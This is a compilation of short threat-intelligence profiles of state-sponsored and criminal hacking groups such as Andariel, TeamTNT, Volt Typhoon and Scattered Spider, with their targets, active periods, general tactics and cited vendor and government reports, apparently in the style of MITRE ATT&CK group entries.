Andariel is a North Korean state-sponsored threat group that has been active since at least 2009. Andariel has primarily focused its operations, which have included destructive attacks, against South Korean government agencies, military organizations, and a variety of domestic companies; it has also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. Andariel's notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle. [FSI Andariel Campaign Rifle July 2017](https://fsiceat.tistory.com/2) [IssueMakersLab Andariel GoldenAxe May 2017](http://www.issuemakerslab.com/research3/) [AhnLab Andariel Subgroup of Lazarus June 2018](https://web.archive.org/web/20230213154832/http://download.ahnlab.com/global/brochure/%5BAnalysis%5DAndariel_Group.pdf) [TrendMicro New Andariel Tactics July 2018](https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html) [CrowdStrike Silent Chollima Adversary September 2021](https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/) Andariel is considered a subset of Lazarus Group and has been attributed to North Korea's Reconnaissance General Bureau. [Treasury North Korean Cyber Groups September 2019](https://home.treasury.gov/news/press-releases/sm774) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.

TeamTNT

TeamTNT is a threat group that has primarily targeted cloud and containerized environments. The group has been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments. [Palo Alto Black-T October 2020](https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/) [Lacework TeamTNT May 2021](https://www.lacework.com/blog/taking-teamtnt-docker-images-offline) [Intezer TeamTNT September 2020](https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/) [Cado Security TeamTNT Worm August 2020](https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/) [Unit 42 Hildegard Malware](https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/) [Trend Micro TeamTNT](https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf) [ATT TeamTNT Chimaera September 2020](https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera) [Aqua TeamTNT August 2020](https://blog.aquasec.com/container-security-tnt-container-attack) [Intezer TeamTNT Explosion September 2021](https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf)

LazyScripter

LazyScripter is a threat group that has mainly targeted the airline industry since at least 2018, primarily using open-source toolsets. [MalwareBytes LazyScripter Feb 2021](https://web.archive.org/web/20211003035156/https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf)

Confucius

Confucius is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between Confucius and Patchwork, particularly in their respective custom malware code and targets. [TrendMicro Confucius APT Feb 2018](https://www.trendmicro.com/en_us/research/18/b/deciphering-confucius-cyberespionage-operations.html) [TrendMicro Confucius APT Aug 2021](https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html) [Uptycs Confucius APT Jan 2021](https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat)

Aquatic Panda

Aquatic Panda is a suspected China-based threat group with a dual mission of intelligence collection and industrial espionage. Active since at least May 2020, Aquatic Panda has primarily targeted entities in the telecommunications, technology, and government sectors. [CrowdStrike AQUATIC PANDA December 2021](https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/)

APT1

APT1 is a Chinese threat group that has conducted cyber espionage against a broad range of victims.

APT10

menuPass is a threat group that has been active since at least 2006. Individual members of menuPass are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.

HEXANE

HEXANE is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. HEXANE's TTPs appear similar to APT33 and OilRig but due to differences in victims and tools it is tracked as a separate entity. [Dragos Hexane](https://dragos.com/resource/hexane/) [Kaspersky Lyceum October 2021](https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf) [ClearSky Siamesekitten August 2021](https://www.clearskysec.com/siamesekitten/) [Accenture Lyceum Targets November 2021](https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns)

BITTER

BITTER is a suspected South Asian cyber espionage threat group that has been active since at least 2013. BITTER has targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia. [Cisco Talos Bitter Bangladesh May 2022](https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html) [Forcepoint BITTER Pakistan Oct 2016](https://www.forcepoint.com/blog/x-labs/bitter-targeted-attack-against-pakistan)

Ember Bear

Ember Bear is a Russian state-sponsored cyber espionage group that has been active since at least 2020, linked to Russia's General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155). [CISA GRU29155 2024](https://www.cisa.gov/sites/default/files/2024-09/aa24-249a-russian-military-cyber-actors-target-us-and-global-critical-infrastructure.pdf) Ember Bear has primarily focused operations against Ukrainian government and telecommunication entities, but has also operated against critical infrastructure entities in Europe and the Americas. [Cadet Blizzard emerges as novel threat actor](https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/) Ember Bear conducted the WhisperGate destructive wiper attacks against Ukraine in early 2022. [CrowdStrike Ember Bear Profile March 2022](https://www.crowdstrike.com/blog/who-is-ember-bear/) [Mandiant UNC2589 March 2022](https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation) [CISA GRU29155 2024](https://www.cisa.gov/sites/default/files/2024-09/aa24-249a-russian-military-cyber-actors-target-us-and-global-critical-infrastructure.pdf) There is some confusion as to whether Ember Bear overlaps with another Russian-linked entity referred to as Saint Bear. At present available evidence strongly suggests these are distinct activities with different behavioral profiles. [Cadet Blizzard emerges as novel threat actor](https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/) [Palo Alto Unit 42 OutSteel SaintBot February 2022](https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/)

LAPSUS$

LAPSUS$ is a cybercriminal threat group that has been active since at least mid-2021. LAPSUS$ specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors. [BBC LAPSUS Apr 2022](https://www.bbc.com/news/technology-60953527) [MSTIC DEV-0537 Mar 2022](https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/) [UNIT 42 LAPSUS Mar 2022](https://unit42.paloaltonetworks.com/lapsus-group/)

POLONIUM

POLONIUM is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess POLONIUM has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling. [Microsoft POLONIUM June 2022](https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/)

Earth Lusca

Earth Lusca is a suspected China-based cyber espionage group that has been active since at least April 2019. Earth Lusca has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some Earth Lusca operations may be financially motivated. [TrendMicro EarthLusca 2022](https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf) Earth Lusca has used malware commonly used by other Chinese threat groups, including APT41 and the Winnti Group cluster; however, security researchers assess Earth Lusca's techniques and infrastructure are separate. [TrendMicro EarthLusca 2022](https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf)

Aoqin Dragon

Aoqin Dragon is a suspected Chinese cyber espionage threat group that has been active since at least 2013. Aoqin Dragon has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between Aoqin Dragon and UNC94, based on malware, infrastructure, and targets. [SentinelOne Aoqin Dragon June 2022](https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/)

SideCopy

SideCopy is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghan government personnel, since at least 2019. SideCopy's name comes from its infection chain, which tries to mimic that of Sidewinder, a suspected Indian threat group. [MalwareBytes SideCopy Dec 2021](https://www.malwarebytes.com/blog/news/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure)

Moses Staff

Moses Staff is a suspected Iranian threat group that has primarily targeted Israeli companies since at least September 2021. Moses Staff openly stated their motivation in attacking Israeli companies is to cause damage by leaking stolen sensitive data and encrypting the victim's networks without a ransom demand. [Checkpoint MosesStaff Nov 2021](https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/) Security researchers assess Moses Staff is politically motivated, and has targeted government, finance, travel, energy, manufacturing, and utility companies outside of Israel as well, including those in Italy, India, Germany, Chile, Turkey, the UAE, and the US. [Cybereason StrifeWater Feb 2022](https://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations)

EXOTIC LILY

EXOTIC LILY is a financially motivated group that has been closely linked with Wizard Spider and the deployment of ransomware including Conti and Diavol. EXOTIC LILY may be acting as an initial access broker for other malicious actors, and has targeted a wide range of industries including IT, cybersecurity, and healthcare since at least September 2021. [Google EXOTIC LILY March 2022](https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/)

CURIUM

CURIUM is an Iranian threat group, first reported in September 2019 and active since at least July 2018, targeting IT service providers in the Middle East. [Symantec Tortoiseshell 2019](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain) CURIUM has since invested in building relationships with potential targets via social media over a period of months to establish trust and confidence before sending malware. Security researchers note CURIUM has demonstrated great patience and persistence by chatting with potential targets daily and sending benign files to help lower their security consciousness. [Microsoft Iranian Threat Actor Trends November 2021](https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021)

Metador

Metador is a suspected cyber espionage group that was first reported in September 2022. Metador has targeted a limited number of telecommunication companies, internet service providers, and universities in the Middle East and Africa. Security researchers named the group Metador based on the "I am meta" string in one of the group's malware samples and the expectation of Spanish-language responses from C2 servers. [SentinelLabs Metador Sept 2022](https://assets.sentinelone.com/sentinellabs22/metador#page=1)

LuminousMoth

LuminousMoth is a Chinese-speaking cyber espionage group that has been active since at least October 2020. LuminousMoth has targeted high-profile organizations, including government entities, in Myanmar, the Philippines, Thailand, and other parts of Southeast Asia. Some security researchers have concluded there is a connection between LuminousMoth and Mustang Panda based on similar targeting and TTPs, as well as network infrastructure overlaps. [Kaspersky LuminousMoth July 2021](https://securelist.com/apt-luminousmoth/103332/) [Bitdefender LuminousMoth July 2021](https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited)

Scattered Spider

Scattered Spider is a native English-speaking cybercriminal group active since at least 2022. [CrowdStrike Scattered Spider Profile](https://www.crowdstrike.com/adversaries/scattered-spider/) [MSTIC Octo Tempest Operations October 2023](https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/) The group initially targeted customer relationship management (CRM) providers, business process outsourcing (BPO) firms, and telecommunications and technology companies before expanding in 2023 to the gaming, hospitality, retail, managed service provider (MSP), manufacturing, and financial sectors. [MSTIC Octo Tempest Operations October 2023](https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/) Scattered Spider relies heavily on social engineering, including impersonating IT and help-desk staff, to gain initial access, bypass multi-factor authentication (MFA), and compromise enterprise networks. The group has adapted its tooling to evade endpoint detection and response (EDR) defenses and has used ransomware for financial gain. [CISA Scattered Spider Advisory November 2023](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a) [CrowdStrike Scattered Spider BYOVD January 2023](https://www.crowdstrike.com/blog/scattered-spider-attempts-to-avoid-detection-with-bring-your-own-vulnerable-driver-tactic/) [Crowdstrike TELCO BPO Campaign December 2022](https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/) Scattered Spider has expanded into hybrid cloud and identity environments, using help-desk impersonation and MFA bypass to obtain administrator access in Okta, AWS, and Office 365. [Mandiant UNC3944 May 2025](https://cloud.google.com/blog/topics/threat-intelligence/unc3944-proactive-hardening-recommendations)

FIN13

FIN13 is a financially motivated cyber threat group that has targeted the financial, retail, and hospitality industries in Mexico and Latin America since as early as 2016. FIN13 achieves its objectives by stealing intellectual property, financial data, mergers and acquisitions information, or PII. [Mandiant FIN13 Aug 2022](https://www.mandiant.com/resources/blog/fin13-cybercriminal-mexico) [Sygnia Elephant Beetle Jan 2022](https://web.archive.org/web/20220105132433/https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf)

Volt Typhoon

Volt Typhoon is a People's Republic of China (PRC) state-sponsored actor that has been active since at least 2021, primarily targeting critical infrastructure organizations in the US and its territories, including Guam. Volt Typhoon's targeting and pattern of behavior have been assessed as pre-positioning to enable lateral movement to operational technology (OT) assets for potential destructive or disruptive attacks. Volt Typhoon has emphasized stealth in its operations, using web shells, living-off-the-land (LOTL) binaries, hands-on-keyboard activity, and stolen credentials. [CISA AA24-038A PRC Critical Infrastructure February 2024](https://www.cisa.gov/sites/default/files/2024-03/aa24-038a_csa_prc_state_sponsored_actors_compromise_us_critical_infrastructure_3.pdf) [Microsoft Volt Typhoon May 2023](https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/) [Joint Cybersecurity Advisory Volt Typhoon June 2023](https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF) [Secureworks BRONZE SILHOUETTE May 2023](https://web.archive.org/web/20230601025540/https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations)

TA2541

TA2541 is a cybercriminal group that has been targeting the aviation, aerospace, transportation, manufacturing, and defense industries since at least 2017. TA2541 campaigns are typically high volume and involve the use of commodity remote access tools obfuscated by crypters and themes related to aviation, transportation, and travel. [Proofpoint TA2541 February 2022](https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight) [Cisco Operation Layover September 2021](https://blog.talosintelligence.com/operation-layover-how-we-tracked-attack/)

MoustachedBouncer

MoustachedBouncer is a cyberespionage group that has been active since at least 2014 targeting foreign embassies in Belarus. [MoustachedBouncer ESET August 2023](https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/)

Mustard Tempest

Mustard Tempest is an initial access broker that has operated the SocGholish distribution network since at least 2017. Mustard Tempest has partnered with Indrik Spider to provide access for the download of additional malware including LockBit, WastedLocker, and remote access tools. [Microsoft Ransomware as a Service](https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/) [Microsoft Threat Actor Naming July 2023](https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide) [Secureworks Gold Prelude Profile](https://www.secureworks.com/research/threat-profiles/gold-prelude) [SocGholish-update](https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update)

Cinnamon Tempest

Cinnamon Tempest is a China-based threat group that has been active since at least 2021 deploying multiple strains of ransomware based on the leaked Babuk source code. Cinnamon Tempest does not operate their ransomware on an affiliate model or purchase access but appears to act independently in all stages of the attack lifecycle. Based on victimology, the short lifespan of each ransomware variant, and use of malware attributed to government-sponsored threat groups, Cinnamon Tempest may be motivated by intellectual property theft or cyberespionage rather than financial gain. [Microsoft Ransomware as a Service](https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/) [Microsoft Threat Actor Naming July 2023](https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide) [Trend Micro Cheerscrypt May 2022](https://www.trendmicro.com/en_se/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html) [SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022](https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader)

ToddyCat

ToddyCat is a sophisticated threat group that has been active since at least 2020 using custom loaders and malware in multi-stage infection chains against government and military targets across Europe and Asia. [Kaspersky ToddyCat June 2022](https://securelist.com/toddycat/106799/) [Kaspersky ToddyCat Check Logs October 2023](https://securelist.com/toddycat-keep-calm-and-check-logs/110696/)

APT5

APT5 is a China-based espionage actor that has been active since at least 2007 primarily targeting the telecommunications, aerospace, and defense industries throughout the U.S., Europe, and Asia. APT5 has displayed advanced tradecraft and significant interest in compromising networking devices and their underlying software including through the use of zero-day exploits. [NSA APT5 Citrix Threat Hunting December 2022](https://media.defense.gov/2022/Dec/13/2003131586/-1/-1/0/CSA-APT5-CITRIXADC-V1.PDF) [Microsoft East Asia Threats September 2023](https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RW1aFyW) [Mandiant Pulse Secure Zero-Day April 2021](https://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day) [Mandiant Pulse Secure Update May 2021](https://www.mandiant.com/resources/blog/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices) [FireEye Southeast Asia Threat Landscape March 2015](https://web.archive.org/web/20220122121143/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-southeast-asia-threat-landscape.pdf) [Mandiant Advanced Persistent Threats](https://www.mandiant.com/resources/insights/apt-groups)

Malteiro

Malteiro is a financially motivated criminal group that is likely based in Brazil and has been active since at least November 2019. The group operates and distributes the Mispadu banking trojan via a Malware-as-a-Service (MaaS) business model. Malteiro mainly targets victims throughout Latin America (particularly Mexico) and Europe (particularly Spain and Portugal). [SCILabs Malteiro 2021](https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/)

APT-C-23

APT-C-23 is a threat group that has been active since at least 2014. [symantec_mantis](https://web.archive.org/web/20231227054130/https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks) APT-C-23 has primarily focused its operations on the Middle East, including Israeli military assets. APT-C-23 has developed mobile spyware targeting Android and iOS devices since 2017. [welivesecurity_apt-c-23](https://web.archive.org/web/20201123042131/www.welivesecurity.com/2020/09/30/aptc23-group-evolves-its-android-spyware/)

Agrius

Agrius is an Iranian threat actor active since 2020 notable for a series of ransomware and wiper operations in the Middle East, with an emphasis on Israeli targets. [SentinelOne Agrius 2021](https://assets.sentinelone.com/sentinellabs/evol-agrius) [CheckPoint Agrius 2023](https://research.checkpoint.com/2023/agrius-deploys-moneybird-in-targeted-attacks-against-israeli-organizations/) Public reporting has linked Agrius to Iran's Ministry of Intelligence and Security (MOIS). [Microsoft Iran Cyber 2023](https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/05/Iran-turning-to-cyber-enabled-influence-operations-for-greater-effect-05022023.pdf)

Saint Bear

Saint Bear is a Russian-nexus threat actor active since early 2021, primarily targeting entities in Ukraine and Georgia. The group is notable for using a specific remote access tool, Saint Bot, and an information stealer, OutSteel, in its campaigns. Saint Bear typically relies on phishing or web staging of malicious documents and related file types for initial access, spoofing government or related entities. [Palo Alto Unit 42 OutSteel SaintBot February 2022](https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/) [Cadet Blizzard emerges as novel threat actor](https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/) Saint Bear has previously been confused with Ember Bear operations, but analysis of behaviors, tools, and targeting indicates these are distinct clusters.

INC Ransom

INC Ransom is a ransomware and data extortion threat group associated with the deployment of INC Ransomware that has been active since at least July 2023. INC Ransom has targeted organizations worldwide most commonly in the industrial, healthcare, and education sectors in the US and Europe. [Bleeping Computer INC Ransomware March 2024](https://www.bleepingcomputer.com/news/security/inc-ransom-threatens-to-leak-3tb-of-nhs-scotland-stolen-data/) [Cybereason INC Ransomware November 2023](https://www.cybereason.com/hubfs/dam/collateral/reports/threat-alert-inc-ransomware.pdf) [Secureworks GOLD IONIC April 2024](https://www.secureworks.com/blog/gold-ionic-deploys-inc-ransomware) [SentinelOne INC Ransomware](https://www.sentinelone.com/anthology/inc-ransom/)

Star Blizzard

Star Blizzard is a cyber espionage and influence group originating in Russia that has been active since at least 2019. Star Blizzard campaigns align closely with Russian state interests and have included persistent phishing and credential theft against academic, defense, government, NGO, and think tank organizations in NATO countries, particularly the US and the UK. [Microsoft Star Blizzard August 2022](https://www.microsoft.com/en-us/security/blog/2022/08/15/disrupting-seaborgiums-ongoing-phishing-operations/) [CISA Star Blizzard Advisory December 2023](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-341a) [StarBlizzard](https://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-evasion-in-ongoing-attacks/) [Google TAG COLDRIVER January 2024](https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/)

Daggerfly

Daggerfly is a People's Republic of China-linked APT entity active since at least 2012. Daggerfly has targeted individuals, government and NGO entities, and telecommunication companies in Asia and Africa. Daggerfly is associated with exclusive use of MgBot malware and is noted for several potential supply chain infection campaigns. [Symantec Daggerfly 2023](https://symantec-enterprise-blogs.security.com/threat-intelligence/apt-attacks-telecoms-africa-mgbot) [ESET EvasivePanda 2023](https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/) [Symantec Daggerfly 2024](https://symantec-enterprise-blogs.security.com/threat-intelligence/daggerfly-espionage-updated-toolset) [ESET EvasivePanda 2024](https://www.welivesecurity.com/en/eset-research/evasive-panda-leverages-monlam-festival-target-tibetans/)

Winter Vivern

Winter Vivern is a group linked to Russian and Belorussian interests active since at least 2020 targeting various European government and NGO entities, along with sporadic targeting of Indian and US victims. The group leverages a combination of document-based phishing activity and server-side exploitation for initial access, leveraging adversary-controlled and -created infrastructure for follow-on command and control. [DomainTools WinterVivern 2021](https://www.domaintools.com/resources/blog/winter-vivern-a-look-at-re-crafted-government-maldocs/) [SentinelOne WinterVivern 2023](https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/) [CERT-UA WinterVivern 2023](https://cert.gov.ua/article/3761104) [ESET WinterVivern 2023](https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/) [Proofpoint WinterVivern 2023](https://www.proofpoint.com/us/blog/threat-insight/exploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability)

Moonstone Sleet

Moonstone Sleet is a North Korean-linked threat actor executing both financially motivated attacks and espionage operations. The group previously overlapped significantly with another North Korean-linked entity, Lazarus Group, but has differentiated its tradecraft since 2023. Moonstone Sleet is notable for creating fake companies and personas to interact with victim entities, as well as developing unique malware such as a variant delivered via a fully functioning game. [Microsoft Moonstone Sleet 2024](https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/)

TA577

TA577 is an initial access broker (IAB) that has distributed QakBot and Pikabot, and was among the first observed groups distributing Latrodectus in 2023. [Latrodectus APR 2024](https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice)

TA578

TA578 is a threat actor that has used contact forms and email to initiate communications with victims and to distribute malware including Latrodectus, IcedID, and Bumblebee. [Latrodectus APR 2024](https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice) [Bitsight Latrodectus June 2024](https://www.bitsight.com/blog/latrodectus-are-you-coming-back)

RedCurl

RedCurl is a threat actor active since 2018 notable for corporate espionage targeting a variety of locations, including Ukraine, Canada and the United Kingdom, and a variety of industries, including but not limited to travel agencies, insurance companies, and banks. [group-ib_redcurl1](https://www.group-ib.com/resources/research-hub/red-curl/) RedCurl is allegedly a Russian-speaking threat actor. [group-ib_redcurl1](https://www.group-ib.com/resources/research-hub/red-curl/) [group-ib_redcurl2](https://www.group-ib.com/resources/research-hub/red-curl-2/) The group’s operations typically start with spearphishing emails to gain initial access, then the group executes discovery and collection commands and scripts to find corporate data. The group concludes operations by exfiltrating files to the C2 servers.

Sea Turtle

Sea Turtle is a Türkiye-linked threat actor active since at least 2017, performing espionage and service provider compromise operations against victims in Asia, Europe, and North America. Sea Turtle is notable for targeting registrars managing ccTLDs and for complex DNS-based intrusions in which the threat actor compromised DNS providers to hijack DNS resolution for the ultimate victims, enabling Sea Turtle to spoof login portals and other applications for credential collection. [Talos Sea Turtle 2019](https://blog.talosintelligence.com/seaturtle/) [Talos Sea Turtle 2019_2](https://blog.talosintelligence.com/sea-turtle-keeps-on-swimming/) [PWC Sea Turtle 2023](https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html) [Hunt Sea Turtle 2024](https://www.huntandhackett.com/blog/turkish-espionage-campaigns)

RedEcho

RedEcho is a People’s Republic of China-related threat actor associated with long-running intrusions in Indian critical infrastructure entities. RedEcho overlaps with various other PRC-linked threat groups, such as APT41, and is linked to ShadowPad malware use through shared infrastructure. [RecordedFuture RedEcho 2021](https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf) [RecordedFuture RedEcho 2022](https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf)

BlackByte

BlackByte is a ransomware threat actor operating since at least 2021. BlackByte is associated with several versions of ransomware also labeled BlackByte Ransomware. BlackByte ransomware operations initially used a common encryption key allowing for the development of a universal decryptor, but subsequent versions such as BlackByte 2.0 Ransomware use more robust encryption mechanisms. BlackByte is notable for operations targeting critical infrastructure entities among other targets across North America. [FBI BlackByte 2022](https://www.ic3.gov/CSA/2022/220211.pdf) [Picus BlackByte 2022](https://www.picussecurity.com/resource/ttps-used-by-blackbyte-ransomware-targeting-critical-infrastructure) [Symantec BlackByte 2022](https://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware) [Microsoft BlackByte 2023](https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/) [Cisco BlackByte 2024](https://blog.talosintelligence.com/blackbyte-blends-tried-and-true-tradecraft-with-newly-disclosed-vulnerabilities-to-support-ongoing-attacks/)

APT42

APT42 is an Iranian-sponsored threat group that conducts cyber espionage and surveillance. [Mandiant APT42-charms](https://services.google.com/fh/files/misc/apt42-crooked-charms-cons-and-compromises.pdf) The group primarily focuses on targets in the Middle East region, but has targeted a variety of industries and countries since at least 2015. [Mandiant APT42-charms](https://services.google.com/fh/files/misc/apt42-crooked-charms-cons-and-compromises.pdf) APT42 starts cyber operations through spearphishing emails and/or the PINEFLOWER Android malware, then monitors and collects information from the compromised systems and devices. [Mandiant APT42-charms](https://services.google.com/fh/files/misc/apt42-crooked-charms-cons-and-compromises.pdf) Finally, APT42 exfiltrates data using native features and open-source tools. [Mandiant APT42-untangling](https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations) APT42 activities have been linked to Magic Hound by other commercial vendors. While there are behavior and software overlaps between Magic Hound and APT42, they appear to be distinct entities and are tracked as separate entities by their originating vendor.

Salt Typhoon

Salt Typhoon is a People's Republic of China (PRC) state-backed actor that has been active since at least 2019 and responsible for numerous compromises of network infrastructure at major U.S. telecommunication and internet service providers (ISP). [US Dept. of Treasury Salt Typhoon JAN 2025](https://home.treasury.gov/news/press-releases/jy2792) [Cisco Salt Typhoon FEB 2025](https://blog.talosintelligence.com/salt-typhoon-analysis/)

Storm-1811

Storm-1811 is a financially-motivated entity linked to Black Basta ransomware deployment. Storm-1811 is notable for unique phishing and social engineering mechanisms for initial access, such as overloading victim email inboxes with non-malicious spam to prompt a fake "help desk" interaction leading to the deployment of adversary tools and capabilities. [Microsoft Storm-1811 2024](https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/) [rapid7-email-bombing](https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators) [RedCanary Storm-1811 2024](https://redcanary.com/blog/threat-intelligence/storm-1811-black-basta/) [RedCanary June Insights 2024](https://redcanary.com/blog/threat-intelligence/intelligence-insights-june-2024/)

Velvet Ant

Velvet Ant is a threat actor operating since at least 2021. Velvet Ant is associated with complex persistence mechanisms, the targeting of network devices and appliances during operations, and the use of zero-day exploits. [Sygnia VelvetAnt 2024A](https://www.sygnia.co/blog/china-nexus-threat-group-velvet-ant/) [Sygnia VelvetAnt 2024B](https://www.sygnia.co/threat-reports-and-advisories/china-nexus-threat-group-velvet-ant-exploits-cisco-0-day/)

UNC3886

